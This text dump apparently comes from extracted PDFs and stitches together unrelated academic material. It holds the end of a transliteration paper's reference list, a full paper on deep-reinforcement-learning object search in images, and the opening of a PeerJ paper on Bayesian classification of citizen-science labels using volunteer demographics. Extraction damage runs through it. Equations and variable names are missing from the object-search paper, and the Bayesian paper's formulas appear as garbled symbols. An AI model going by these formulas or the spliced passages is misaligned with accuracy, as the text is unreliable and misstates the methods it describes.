bridge lan- guages. In Human Language Technologies: The 2010 Annual Conference of the North American Chapter of the Association for Computational Linguistics. DiederikKingmaandJimmyBa. 2014. Adam: Amethod for stochastic optimization. In International Confer- ence on Learning Representations. Alexandre Klementiev and Dan Roth. 2006. Weakly supervised named entity transliteration and discovery from multilingual comparable corpora. InProceedings of the21st InternationalConferenceonComputational Linguistics and the 44th Annual Meeting of the Asso- ciation for Computational Linguistics. Philipp Koehn, Hieu Hoang, Alexandra Birch, Chris Callison-Burch, Marcello Federico, Nicola Bertoldi, Brooke Cowan, Wade Shen, Christine Moran, Richard Zens, Chris Dyer, Ondřej Bojar, Alexandra Constantin, and Evan Herbst. 2007. Moses: Open source toolkit for statistical machine translation. In Proceedings of the 45th Annual Meeting of the ACL on Interactive Poster and Demonstration Sessions. A. Kumaran, Mitesh M. Khapra, and Pushpak Bhat- tacharyya. 2010. Compositional machine transliter- ation. ACM Transactions on Asian Language Infor- mation Processing. Anoop Kunchukuttan and Pushpak Bhattacharyya. 2015. Data representation methods and use of mined corpora for Indian language transliteration. In Named Entities Workshop. 315 Anoop Kunchukuttan, Ratish Puduppully, and Pushpak Bhattacharyya. 2015. Brahmi-Net: A transliteration and script conversion system for languages of the In- dian subcontinent. In Conference of the North Amer- ican Chapter of the Association for Computational Linguistics - Human Language Technologies: System Demonstrations. Anoop Kunchukuttan, Pushpak Bhattacharyya, and Mitesh M. Khapra. 2016. Substring-based unsu- pervised transliteration with phonetic and contextual knowledge. In SIGNLL Conference on Computational Natural Language Learning. Jason Lee, Kyunghyun Cho, and Thomas Hofmann. 2017. Fully character-level Neural Machine Transla- tion without explicit segmentation. Transactionsof the Association for Computational Linguistics. Bruno Pouliquen, Ralf Steinberger, Camelia Ignat, Tem- nikova Irina, and Anna Widiger. 2005. Multilingual person name recognition and transliteration. Corela. Ram Prakash. 2012. Quillpad multilingual predictive transliteration system. In Proceedings of the Second Workshop on Advances in Text Input Methods. V. Rudramurthy, Mitesh M. Khapra, and Pushpak Bhat- tacharyya. 2016. Sharing network parameters for crosslingual Named Entity Recognition. arXiv preprint arXiv:1607.00198. Amrita Saha, Mitesh M. Khapra, Sarath Chandar, Ja- narthanan Rajendran, and Kyunghyun Cho. 2016. A correlational encoder-decoder architecture for pivot- based sequence generation. In International Confer- ence on Computational Linguistics. Rico Sennrich, Orhan Firat, Kyunghyun Cho, Alexan- dra Birch, Barry Haddow, Julian Hitschler, Marcin Junczys-Dowmunt, Samuel Läubli, Antonio Valerio Miceli Barone, Jozef Mokry, and Maria Nadejde. 2017. Nematus: A toolkit for neural machine trans- lation. In Software Demonstrations of the 15th Con- ference of the European Chapter of the Association for Computational Linguistics. Nitish Srivastava, Geoffrey Hinton, Alex Krizhevsky, Ilya Sutskever, and Ruslan Salakhutdinov. 2014. Dropout: A simple way to prevent neural networks from overfitting. The Journal of Machine Learning Research. Kārumūri V Subbārāo. 2012. South Asian languages: A syntactic typology. Cambridge University Press. Harshit Surana and Anil Kumar Singh. 2008. A more discerning and adaptable multilingual transliteration mechanism for Indian languages. In Proceedings of the Third International Joint Conference on Natural Language Processing. Laurens van der Maaten and Geoffrey Hinton. 2008. Vi- sualizing data using t-SNE. JournalofMachineLearn- ing Research. Denny Vrandečić and Markus Krötzsch. 2014. Wikidata: a free collaborative knowledgebase. Communications of the ACM. Zhilin Yang, Ruslan Salakhutdinov, and William Cohen. 2016. Multi-task cross-lingual sequence tagging from scratch. arXiv preprint arXiv:1603.06270. Su-Youn Yoon, Kyoung-Young Kim, and Richard Sproat. 2007. Multilingual transliteration using fea- ture based phonetic method. In Annual Meeting- Association for Computational Linguistics. Barret Zoph, Deniz Yuret, Jonathan May, and Kevin Knight. 2016. Transfer learning for low-resource Neural Machine Translation. 316 work_nx6kkwvy6bb4bkkqnpld6s7gty ---- International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 DOI: 10.21307/ijanmc-2020-029 65 Hierarchical Image Object Search Based on Deep Reinforcement Learning Wei Zhang School of Computer Science and Engineering Xi'an Technological University Xi'an, China E-mail: weivanity@ gmail.com Hongge Yao School of Computer Science and Engineering Xi'an Technological University Xi'an, China E-mail: 835092445@qq.com Yuxing Tan School of Computer Science and Engineering Xi'an Technological University Xi'an, China E-mail: 842061340@qq.com Abstract—Object detection technology occupies a pivotal position in the field of modern computer vision research， its purpose is to accurately locate the object human beings are looking for in the image and classify the object. With the development of deep learning technology, convolutional neural networks are widely used because of their outstanding performance in feature extraction, which greatly improves the speed and accuracy of object detection. In recent years, reinforcement learning technology has emerged in the field of artificial intelligence, showing excellent decision-making ability to deal with problems. In order to combine the perception ability of deep learning technology with the decision-making ability of reinforcement learning technology, this paper incorporate reinforcement learning into the convolutional neural network, and propose a hierarchical deep reinforcement learning object detection model. Keywords-Object Detection; Deep Learning; Reinforcement Learning I. INTRODUCTION When observing a picture, humans can immediately know the location and category of the object in the image, and can get the information without even thinking too much. This is a breeze for us, but the computer cannot have all kinds of complicated ideas of our human brain, and it is not easy to realize it. In computer vision, the positioning and retrieval of images will be affected by two aspects, one is the content of the image, and the other is the pros and cons of the algorithm. There are two main factors influencing the image. The first is that the background and light when taking pictures will affect the quality of the image, resulting in a decrease in the accuracy of object detection. The second is the content of the image. If there are several similar objects, or some are mailto:835092445@qq.com International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 66 blocked by other objects, and the different angles of the object will affect the accuracy of detection. The algorithm mainly focuses on how to make the features have higher quality. Therefore, how to design an algorithm that can satisfy accurate positioning and continuously improve the object positioning speed is the key to research. For computers, these pictures are data collections which are composed of binary digits, and the things behind the data cannot be imagined by computers. Our purpose is to let the computer simulate our human vision and simply have the ability to process the image. Human beings get a lot of information in real life every day, and most of them belongs to the information transmitted to us by vision, and only part of the information in these visual images is what human need. Therefore, by extracting the important information, positioning and identifying them accurately, human can greatly reduce the amount of data that the computer needs to process and improve the efficiency of data processing. Reinforcement learning is an important field in machine learning. It constructs a Markov Decision Process and simulates human thinking to teach agents how to make actions that can obtain high reward values in the environment, and find the best strategy to solve the problem in such constant interaction. Based on this idea, this paper use reinforcement learning technology to simulate the human visual attention mechanism. The agent is taught to change the shape of the bounding box and focus only on a significant part of the image at a time, and then extract its features through the convolutional neural network. Finally, the object of image positioning and classification can be achieved. II. RELATED WORK A. Traditional object detection algorithm Traditional object detection algorithms include primary feature extraction methods such as HOG feature extraction of objects and training SVM classifiers for recognition. Their algorithms are generally divided into three stages (see Figure 1.): 1) Select different sliding window frames according to the size of the object, and use the sliding window to select a part of the content in the figure as a candidate area. 2) Extract visual features from candidate regions. 3) Use SVM classifier for identification. Figure 1. Traditional object detection algorithm The traditional object search algorithm has the following disadvantages: 1) The selection strategy based on sliding windows is to slide across the entire image from beginning to end. For different object sizes, the program need windows with different size ratios to traverse. Although it can mark all the positions of the object, its brute-force enumeration search results in extremely high time complexity and a large number of windows that are not related to the object, so the speed and performance of feature extraction and classification have fallen into a bottleneck. 2) The characteristics of each object are different, which leads to the diversity of forms, and the background factors of each object will also affect the accuracy of recognition. Therefore, the features of manual design are not very robust. Input image Region selection Feature extraction Classification International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 67 B. Object detection algorithm based on deep learning After the appearance of CNN, it has been widely used in the field of computer vision. With the continuous development of science and technology, the difficulty of obtaining a large amount of sample data has been significantly reduced, and the continuous improvement of computing capabilities has enabled CNN to have the ability to extract features from a large amount of data, which has made huge gains in computer vision. Aiming at the shortcomings of traditional method for object detection, the object detection algorithm based on deep learning uses CPMC, Selective Search, MCG, RPN and other methods to generate candidate regions instead of window sliding strategy. These methods usually use various details of the image, such as image contrast, edge parts and color to extract higher-quality candidate regions, while reducing the number of candidate regions and time complexity. This type of object detection method is generally divided into two types: one-stage detection algorithm and two-stage detection algorithm. The one-stage detection algorithm regards the object detection problem as a regression problem and directly obtains the category and position information of the object. The detection speed of the algorithm is fast, but the accuracy is low. The two-stage detection algorithm first generates a large number of region proposals, and then classifies these region proposals through the convolutional neural network, so the accuracy is higher, but the detection speed is slower. C. Object detection algorithm based on deep reinforcement learning In recent years, research on deep reinforcement learning has emerged endlessly. It has achieved excellent performance in many games than human master players, especially the success of the DeepMind team on the AlphaGO project, pushing deep reinforcement learning to a new height. In this context, many researchers try to apply deep reinforcement learning technology in the field of object detection. In 2015, Caicedo et al. adopted a top-down search strategy, analyzed the entire scene at the beginning, and then continued to move toward the object location. That is, use a larger bounding box to frame the object, and then shrink it step by step, eventually making the object surrounded by a compact bounding box. In 2016, Mathe et al. proposed an image-based sequence search model to extract image features from a small number of pre-selected image positions in order to efficiently search for visual objects. By formulating sequential search as reinforcement learning of the search policy, their fully trainable model can explicitly balance for each class, specifically, the conflicting goals of exploration - sampling more image regions for better accuracy -, and exploitation - stopping the search efficiently when sufficiently confident about the object's location. The above algorithm models all use reinforcement learning techniques to improve deep learning algorithms, and all have achieved good results. However, if the visual object algorithm is required to have a relatively high accuracy, it still needs to rely on a large number of candidate regions, so our research direction is to reduce the number of candidate regions while maintaining the quality of the candidate regions at a high level. III. HIERARCHICAL OBJECT SEARCH MODEL BASED ON DRL A. MDP formulation This paper regard object detection as a Markov Decision Process, and find an effective object detection strategy by solving decision problems. In each process, the agent interacts with the current environment based on the current state, and decides the next search action, and gets an instant reward value. The agent continuously improves the efficiency of search in the International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 68 process of learning to obtain high cumulative reward value. There are 6 different actions in action space A, which are composed of two different types: select action and stop action. The selection action is to frame a part of the current area as the next observation area. It consists of four borders and a center frame, which respectively reduce the current search area to different sub-regions (see Figure 2.); the stop action indicates that the object has been found, so the bounding box is no longer changed, and the search process stops. In reinforcement learning, the state is the premise and basis for the agent to make actions. In this model, the state is composed of two aspects. One is the feature vector extracted by the convolutional neural network in the current state. The other is the historical action information performed in the process of searching for the object. This information helps to stabilize the search trajectory, so that the search process will not fall into the loop search, thereby improving the accuracy of the search. Figure 2. The selection action diagram Figure 3. Sample generation process diagram based on Markov decision process The function of the reward is to reflect the reaction obtained by the agent during the interaction with the environment. The agent judges the merits of the action according to the different rewards received, and finally learns the strategy by maximizing the cumulative reward. Since the agent have two types of actions, our calculation methods are different depending on the type of action. The reward obtained by the agent depends on the action it takes in the current state. The model use to evaluate the effect of the action, so that the accuracy of detection can be obtained. This paper take as the observation area after the movement, as the observation area before the movement, and as the area of the object area, is the reward obtained after making the selection action, then our reward function can be expressed for: (1) If the difference of the overlap rate is positive, it means that our prediction range is closer to the object International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 69 area, if it is negative, it means that the prediction range is farther from the object area. If the decision improves the detection accuracy, the reward is positive, otherwise the reward is negative. The model use as the reward function for the stop action, and set the reward value for the stop action as . At the same time, the program need to add a threshold to determine when it will end the action. When the value of is greater than the threshold, indicating that object has been found, then the program can end the search and perform the stop action. At the same time as there is a reward process, there is also a punishment when continues to fall below the threshold and reaches the maximum number of searches. So that the agent knows the wrong process and corrects it. The reward function for the stop action is as follows: (2) B. DQN algorithm The model use three fully connected layers to form the Q-network, its input is the information content of the image, and the activation values of the 6 neurons in the output layer represent the confidence of 6 kinds of actions, among which the highest confidence corresponding action is selected. According to the state, action and reward function, the agent apply the Q-learning algorithm to learn the optimal strategy. Because the input image is a high-dimensional data, this paper use to approximate the Q function in high dimensions. The Q function based on strategy π is expressed as follows: (3) The agent selects the action with the highest Q value from the Q function, and uses the Bellman equation to continuously update the Q function: (4) Among them, is the current state, is the selected action in the current state, is the immediate reward, is the discount factor, indicates the next state, and indicates the next action to be taken. In order to train , the program need a large number of training samples which are usually continuously sampled (see Figure 3.), but the continuity between adjacent samples will cause inefficiency and instability of Q-network learning. This paper use the experience-replay mechanism to solve this problem. When the capacity of the experience pool tends to be saturated, the program constantly replace the old samples with new samples. At the same time, in order to make most of the samples selected with nearly the same probability, the program randomly extract samples in the experience pool. The loss function of the training process is set as follows: (5) Among them, is the actual output of the network, is the expected output of the network, is the current reward value, is the maximum expected reward value for the next decision, is the discount factor. C. Hierarchical object search process The initial candidate region of the model is the entire image. The size of the candidate region is normalized to a fixed size, and then put into a trained International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 70 CNN neural network model to extract feature values, and then rely on the greedy algorithm to use the probability randomly select one of all actions to search, or use the learned strategy to make action decisions with a probability of . After the model made action , it switched to a new candidate area which is a sub-region of the previous region, according to the reward function to give our agent the corresponding reward , and at the same time normalize the new candidate area and put it into the neural network model for features extraction, combine with previous actions to get a new state . Repeat the above hierarchical process continuously until our action becomes a stop action, or the number of search steps reaches the upper limit. If a stop action occurs, the final reward is given according to its corresponding termination reward function. IV. EXPERIMENT A. Data sets and parameter settings Use the Pascal VOC data set to train the model, which is the most used data set for object detection. The training set uses the combination of Pascal VOC 2007 and Pascal VOC 2012, and the test set uses the Pascal VOC 2007 Test Set. The model use three fully connected layers to form a Q-network. Its input is the information content of the image. The activation values of 6 neurons in the output layer represent the confidence of 6 actions. The parameters of the network are initialized by a standard normal distribution function. The initial value of the greedy factor is 1, every iteration, the decreases by 0.1, and stops when it decreases to 0.1. Set the size of the experience pool to 1000, the reward discount coefficient to 0.9, and the threshold to make the stop action is 0.5. B. Experimental results and analysis ● Model training In the process of training the model, the value of the loss function is continually declining along with the continuous iteration of the neural network, making the neural network tend to converge (see Figure 4.). When the number of training times reaches a certain level, the loss value tends to be stable, and various parameters in the network are also updated, forming a neural network model with recognition capabilities. Figure 4. Schematic diagram of loss function International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 71 ● Results and analysis The model first analyzes the entire picture and finds the object through a series of frame transformation actions. Finally, the agent make the stop action indicate the end of the search. The following figure shows this hierarchical dynamic selection process in detail. Figure 5. Hierarchical dynamic selection process Experimental results show that the algorithm model proposed in this paper can improve the search speed and accuracy in object search. However, it can also be seen from the experiment that there may still be errors in the match between the object prediction frame and the actual bounding box of the object, because the model can only continue to select from the area selected by the previous bounding box. As a result, the predicted bounding box cannot reach other areas of the image. The model can improve the detection result by changing the appropriate proportion of the framed area. V. CONCLUSION This paper propose an object detection model based on deep reinforcement learning, which focuses on International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 72 different areas of the picture by performing a predefined area selection action, and iterates the process to make the bounding box tightly surround the object, Finally achieved the positioning and classification of object. Experiments show that the model can effectively detect the object in the image. REFERENCES [1] Sutton R S, Barto A G. Reinforcement learning: An introduction[M]. MIT press, 2018. [2] Gagniuc P A. Markov chains: from theory to implementation and experimentation[M]. John Wiley & Sons, 2017. [3] Hu Y, Xie X, Ma W Y, et al. Salient region detection using weighted feature maps based on the human visual attention model[C]//Pacific-Rim Conference on Multimedia. Springer, Berlin, Heidelberg, 2004: 993-1000. [4] Ren S, He K, Girshick R, et al. Faster r-cnn: Towards real-time object detection with region proposal networks[C]//Advances in neural information processing systems. 2015: 91-99. [5] LeCun Y, Bottou L, Bengio Y, et al. Gradient-based learning applied to document recognition[J]. Proceedings of the IEEE, 1998, 86(11): 2278-2324. [6] Dalal N, Triggs B. Histograms of oriented gradients for human detection[C]//2005 IEEE computer society conference on computer vision and pattern recognition (CVPR'05). IEEE, 2005, 1: 886-893. [7] Boser B E, Guyon I M, Vapnik V N. A training algorithm for optimal margin classifiers[C]//Proceedings of the fifth annual workshop on Computational learning theory. 1992: 144-152. [8] Papandreou G, Kokkinos I, Savalle P A. Modeling local and global deformations in deep learning: Epitomic convolution, multiple instance learning, and sliding window detection[C]//Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition. 2015: 390-399. [9] Carreira J, Sminchisescu C. CPMC: Automatic object segmentation using constrained parametric min-cuts[J]. IEEE Transactions on Pattern Analysis and Machine Intelligence, 2011, 34(7): 1312-1328. [10] Uijlings J R R, Van De Sande K E A, Gevers T, et al. Selective search for object recognition[J]. International journal of computer vision, 2013, 104(2): 154-171. [11] Pont-Tuset J, Arbelaez P, Barron J T, et al. Multiscale combinatorial grouping for image segmentation and object proposal generation[J]. IEEE transactions on pattern analysis and machine intelligence, 2016, 39(1): 128-140. [12] Silver D, Huang A, Maddison C J, et al. Mastering the game of Go with deep neural networks and tree search[J]. nature, 2016, 529(7587): 484-489. [13] Caicedo J C, Lazebnik S. Active object localization with deep reinforcement learning[C]//Proceedings of the IEEE international conference on computer vision. 2015: 2488-2496. [14] Mathe S, Pirinen A, Sminchisescu C. Reinforcement learning for visual object detection[C]//Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition. 2016: 2894-2902. [15] Watkins C J C H, Dayan P. Q-learning[J]. Machine learning, 1992, 8(3-4): 279-292. [16] Mnih V, Kavukcuoglu K, Silver D, et al. Playing atari with deep reinforcement learning[J]. arXiv preprint arXiv:1312.5602, 2013. work_nyaahrjgj5h4hbe4yk5dmjq6d4 ---- Using demographics toward efficient data classification in citizen science: a Bayesian approach Using demographics toward efficient data classification in citizen science: a Bayesian approach Pietro De Lellis1,2, Shinnosuke Nakayama2 and Maurizio Porfiri2,3 1 Department of Electrical Engineering and Information Technology, University of Naples Federico II, Naples, Italy 2 Department of Mechanical and Aerospace Engineering, New York University Tandon School of Engineering, Brooklyn, NY, USA 3 Department of Biomedical Engineering, New York University Tandon School of Engineering, Brooklyn, NY, USA ABSTRACT Public participation in scientific activities, often called citizen science, offers a possibility to collect and analyze an unprecedentedly large amount of data. However, diversity of volunteers poses a challenge to obtain accurate information when these data are aggregated. To overcome this problem, we propose a classification algorithm using Bayesian inference that harnesses diversity of volunteers to improve data accuracy. In the algorithm, each volunteer is grouped into a distinct class based on a survey regarding either their level of education or motivation to citizen science. We obtained the behavior of each class through a training set, which was then used as a prior information to estimate performance of new volunteers. By applying this approach to an existing citizen science dataset to classify images into categories, we demonstrate improvement in data accuracy, compared to the traditional majority voting. Our algorithm offers a simple, yet powerful, way to improve data accuracy under limited effort of volunteers by predicting the behavior of a class of individuals, rather than attempting at a granular description of each of them. Subjects Algorithms and Analysis of Algorithms, Scientific Computing and Simulation Keywords Citizen science, Bayesian estimation, Data classification, Algorithms INTRODUCTION Involvement of crowds in the creation of goods and services has become a powerful and successful model to achieve goals (Howe, 2006). Crowdsourcing can take various forms, which can be classified based on types of contributions and motivations, with openness to the public as a common feature (Franzoni & Sauermann, 2014; Sauermann & Franzoni, 2015). For example, some crowdsourcing platforms recruit crowdworkers to undertake microtasks (Difallah et al., 2015), and others seek for innovative ideas and solutions (Penin & Burger-Helmchen, 2012; Estellés-Arolas & González-Ladrón-de Guevara, 2012; Majchrzak & Malhotra, 2013; Cappa, Rosso & Hayes, 2019) or money (Lehner, 2013; Belleflamme, Lambert & Schwienbacher, 2014), by extrinsically motivating the crowds with rewards. Over the past decades, participation in scientific activities by public volunteers, often called citizen science, has emerged as a new tool to conduct science at an unprecedentedly large scale (Silvertown, 2009; Bonney et al., 2014). Citizen science is uniquely positioned in crowdsourcing typologies, as the crowds contribute to science How to cite this article De Lellis P, Nakayama S, Porfiri M. 2019. Using demographics toward efficient data classification in citizen science: a Bayesian approach. PeerJ Comput. Sci. 5:e239 DOI 10.7717/peerj-cs.239 Submitted 7 June 2019 Accepted 26 October 2019 Published 25 November 2019 Corresponding author Maurizio Porfiri, mporfiri@nyu.edu Academic editor Jingbo Wang Additional Information and Declarations can be found on page 14 DOI 10.7717/peerj-cs.239 Copyright 2019 De Lellis et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.239 mailto:mporfiri@�nyu.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.239 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ through intrinsic motivation on voluntarism, rather than extrinsic motivation based on receiving rewards (Ryan & Deci, 2000; Nov, Arazy & Anderson, 2014; Cappa et al., 2018). With prevalence of the Internet, citizen science now attracts diverse people to contribute to research projects by collecting and analyzing raw data online at their convenience. Popular and successful citizen science projects include eBird, where volunteers upload the locations of observed birds (https://ebird.org), and EyeWire, where volunteers reconstruct retinal neurons in 3D from 2D images (https://eyewire.org). Although citizen science enables scientists to acquire a large amount of processed data, it may come at the expense of data quality. Since the data are collected and analyzed by the untrained public, they might suffer from low quality, challenging contribution to science (Dickinson, Zuckerberg & Bonter, 2010; Kosmala et al., 2016; Kallimanis, Panitsa & Dimopoulos, 2017). Therefore, it is of interest to citizen science practitioners to enhance the quality of data, while making good use of volunteers’ effort. A common practice in citizen science builds upon the wisdom of the crowd, whereby scientists distribute the same tasks to multiple participants and then aggregate the data (Swanson et al., 2015). Beyond aggregation rules, sophisticated methods have been proposed in the field of crowdsourcing to tackle the so-called noisy labeler problem (Sheng, Provost & Ipeirotis, 2008; Frenay & Verleysen, 2014). One of the most notable methods employs an expectation-maximization algorithm (Dawid & Skene, 1979), where the ground truth and the reliability of labelers are simultaneously estimated through an iterative procedure to maximize the likelihood of the model parameters. The method can also be extended into a Bayesian framework for more accurate estimation of ground truth and labeler reliability (Raykar et al., 2010; Kim & Ghahramani, 2012). However, having a granular characterization of each participant could be practically unfeasible or not convenient. Indeed, this would require every volunteer to participate in a preliminary session in which their accuracy would be thoroughly characterized. This might represent an unacceptable misuse of the volunteers’ time, and it will likely be unfeasible in realistic cases where the volunteers contribute only for a very limited time (Nov, Arazy & Anderson, 2011). An economical solution to mitigate the redundancy of volunteers’ effort is to collect labels on the same instance repeatedly from different labelers until it meets a threshold defined by a requester (Chen, Lin & Zhou, 2013; Li et al., 2016). Further, in dynamic task allocation, a next instance to be labeled is selected from a pool of instances through a Bayesian Markov decision process, which identifies the instance that would maximize a reward function if it were labeled next (Chen, Lin & Zhou, 2013). In this way, requesters can minimize the effort of labelers, while maintaining adequate data quality. However, the basic algorithm assumes that all labelers have equal reliability, which is unlikely true in citizen science. While the approach can be extended to estimate both ground truth and labeler reliability simultaneously in sequential task allocation, it might become unfeasible in citizen science to accurately estimate reliability of each volunteer with only a few instances of labels (Nov, Arazy & Anderson, 2011). Thus far, the diversity of volunteers in citizen science poses a challenge to accurately estimating the ground truth, but it may be possible to turn the tables and harness this De Lellis et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.239 2/18 https://ebird.org https://eyewire.org http://dx.doi.org/10.7717/peerj-cs.239 https://peerj.com/computer-science/ diversity to enhance data accuracy. Since citizen science welcomes everyone by nature, volunteers belong to a wide demographic, with diverse age and educational level (Cappa et al., 2016; Burgess et al., 2017), as well as motivations (Nov, Arazy & Anderson, 2014; Curtis, 2015; Cappa et al., 2018). These individual attributes could provide additional information toward enhancing data accuracy while safeguarding volunteers’ effort. For example, the motivational level explains both quality and quantity in citizen science (Nov, Arazy & Anderson, 2014), and the educational level is positively related to the accuracy of identifying invasive species (Delaney et al., 2008). In a Bayesian sense, this information may help enhance data accuracy by affording an informative prior distribution of reliability for each individual attribute. A Bayesian framework has been used by Garriga, Piera & Bartumeus (2017) to evaluate and rank participants in citizen science projects based on their reputation, with the final goal of increasing the likelihood of engagement and the overall data quality. Here, we investigate the possibility of employing a Bayesian approach to enhance classification accuracy by harnessing diversity of volunteers in citizen science. Specifically, this study aims at improving the accuracy of noisy data by incorporating information about demographics of volunteers into a Bayesian framework and dynamically distributing tasks among a limited number of volunteers. We use data collected within a citizen science project, the Brooklyn Atlantis (Laut et al., 2014), where volunteers performed binary classification tasks. The study aimed at monitoring the environment of the Gowanus Canal (Brooklyn, NY), a highly polluted body of water in the USA. Volunteers were presented with images of the Canal and asked to classify the objects in the images, by assessing whether they might represent a threat to the environment (Torre et al., 2019). Before classifying the image, they were asked selected demographic information, which were not analyzed in Torre et al. (2019), whose focus was on improving data accuracy by providing a possibility to cast blank votes in a classification task. Specifically, the degree of interest of the volunteers toward the environment and their level of education were recorded. Using the dataset of Torre et al. (2019), we applied a Bayesian approach that leverages these individual attributes for enhancing the classification efficiency. To validate the approach, we allocated volunteers randomly to tasks until the theoretical accuracy of the classification overcomes a chosen threshold. We computed the average classification accuracy and number of volunteers employed as performance metrics, and compared them against the traditional majority voting approach. METHODS Data collection The data used in this study were collected within a citizen science project for obtaining information about the status of the environmental health of the Gowanus Canal (Brooklyn, NY, USA) (Torre et al., 2019). The images were taken by an aquatic robot designed as part of the Brooklyn Atlantis project (Laut et al., 2014), which, over the years, was used to address a number of important questions in citizen science, from the effect of design interventions to face-to-face interactions with scientists and on to improving engagement De Lellis et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.239 3/18 http://dx.doi.org/10.7717/peerj-cs.239 https://peerj.com/computer-science/ in rehabilitation exercises (Laut et al., 2015, 2017; Nov, Laut & Porfiri, 2015; Cappa et al., 2016, 2018; Palermo et al., 2017a, 2017b; Diner et al., 2018; Nakayama et al., 2018; Torre et al., 2019). Volunteers were asked to inspect the images of the Canal and identify the presence of objects that could endanger the environment (Torre et al., 2019). The images taken by the robot were uploaded on a temporary website built for this experiment, where volunteers could access them from their computers and mobile devices. Before taking part in the project, participants had to log in through either a Facebook profile or an email account to prevent them from performing the task more than once. After accessing the website, participants were first presented with a short movie about the scope of the project. Then, participants initiated a practice session, in which they were instructed to classify whether the object in the image would represent a potential threat to the environment by clicking either a “threat,” “no threat,” or “I don’t know” button below the image. After the task was performed, the correct answer was shown together with a brief explanation. Before the experiment, Torre et al. (2019) identified the correct answer of each image through careful examination and discussion, and the selection of images only included those which received a unanimous classification. After the classification of two objects in the practice session, the main task started, and participants were asked to classify 31 images consecutively, which appeared on the screen for 5 s each. Participant could choose between “threat,” “no threat,” or “I don’t know” buttons, but this time, the correct answer was not displayed. If the participant did not select any answer in 5 s, it was recorded as “no answer.” To avoid possible confounding effects on performance, the order of the images’ display was randomized for each participant. Upon completing the classification task, the participants were asked to fill out a short questionnaire where they provided information on their education level and degree of interest toward the environment. The data collection was carried out between February and June 2017, with a total of 91 volunteers recruited in the project. Here, we focus on the 88 of them who filled out the preliminary demographic questionnaire. All the participants were over 18 years old and their responses were anonymized. The data collection was approved by the institutional review board of New York University (IRB-FY2016-184). Bayesian inference Let us assume that a pool V ¼ f1; . . . ; ng of volunteers participates in the binary classification of a set I ¼ f1; . . . ; mg of images. In the process of classification of image i 2 I, the unobservable binary parameter that we wish to estimate is denoted as ui. In our experiment, ui is equal to 1 if image i contains a threat for the environment, and it is equal to 2 otherwise. A priori, we assume that we have no cues on the possible content of that image, and therefore we set P0 ui ¼ 1ð Þ ¼ P0 ui ¼ 2ð Þ ¼ 0:5 for all i, where the subscript 0 indicates that we refer to the probability at step 0, that is, before starting the classification process. After every successive classification, we propose De Lellis et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.239 4/18 http://dx.doi.org/10.7717/peerj-cs.239 https://peerj.com/computer-science/ to sequentially update these probabilities by using Bayes’ rule (Gelman et al., 2013). At each classification step, say j � 1, the observable data is the classification yil of image i performed by participant l = l(j), randomly selected from the pool V at step j. The possible outcomes of the observed variable yil are 0, corresponding to a late reply (the participant does not classify within 5 s), 1 or 2, corresponding to the participant classifying the image as containing or not containing a threat, respectively, and 3, corresponding to an uncertain participant choosing the “I don’t know” option. In a Bayesian framework, the behavior of the l-th participant is characterized by the conditional probabilities Pðyil ¼ ajui ¼ bÞ; (1) for all a ∈ {0,1,2,3}, β ∈ {1,2}, and i 2 I. Since we do not know a priori whether some images are more difficult to classify than others, we assume that the probabilities in (1) are independent of i, and therefore, for all i 2 I, we write Pðyil ¼ ajui ¼ bÞ ¼ Pðyl ¼ ajui ¼ bÞ; (2) which represents the probability that the classification output of the l-th participant is equal to a, given that the image contains (or does not contain) a threat (depending on the value of β). In this work, we propose that the behavior of a volunteer, say the l-th, is related to his/ her demographics (such as motivations and educational level), encoded by a vector xl of one or more integer variables. More specifically, we assume that the probabilities (1) depend on the variables xl, which are therefore called explanatory in the Bayesian literature (Carlin, Louis & Carlin, 2000; Gelman et al., 2013; Garriga, Piera & Bartumeus, 2017). Accordingly, based on the classification performed by the participant l(j) randomly selected at step j, and on his/her demographics, the probability that image i contains a threat for the environment can be updated in a Bayesian fashion as follows: Pjðui ¼ 1Þ ¼ Pðyl ¼ a; ui ¼ 1; xlÞ Pðyl ¼ a; xlÞ ¼ Pðyl ¼ ajui ¼ 1; xlÞ; Pðxl; ui ¼ 1Þ Pðyl ¼ ajxlÞPðxlÞ ¼ Pðyl ¼ ajui ¼ 1; xlÞPðxljui ¼ 1ÞPðui ¼ 1Þ Pðyl ¼ ajxlÞPðxlÞ ; (3) for all j � 1, where Pj(ui = 1) is defined as Pj(ui = 1|yl = a, xl), and we omit the explicit dependence of l on j to simplify the notation. Observing that xl and ui are independent, we have P(xl|ui = 1) = P(xl), thus yielding Pjðui ¼ 1Þ ¼ Pðyl ¼ ajui ¼ 1; xlÞPðui ¼ 1Þ Pðyl ¼ ajxlÞ : (4) From the law of total probability, we can write Pðyl ¼ ajxlÞ ¼ Pðyl ¼ ajui ¼ 1; xlÞPðui ¼ 1jxlÞ þ Pðyl ¼ ajui ¼ 2; xlÞPðui ¼ 2jxlÞ: (5) Noting again the independence between xl and ui, and substituting (5) into (4), we finally establish De Lellis et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.239 5/18 http://dx.doi.org/10.7717/peerj-cs.239 https://peerj.com/computer-science/ Pjðui ¼ 1Þ ¼ Pðyl ¼ ajui ¼ 1; xlÞPj�1ðui ¼ 1Þ Pðyl ¼ ajui ¼ 1; xlÞPj�1ðui ¼ 1Þ þ Pðyl ¼ ajui ¼ 2; xlÞPj�1ðui ¼ 2Þ ; (6) where we used as prior Pj - 1(ui = 1). 1 Once the conditional probabilities P(yl = a|ui = β, xl), for all a, β, and xj, have been estimated on a sample of volunteers, then, as a new volunteer v decides to participate in the study, we only need access to the demographics xv to characterize his/her behavior. Setting a 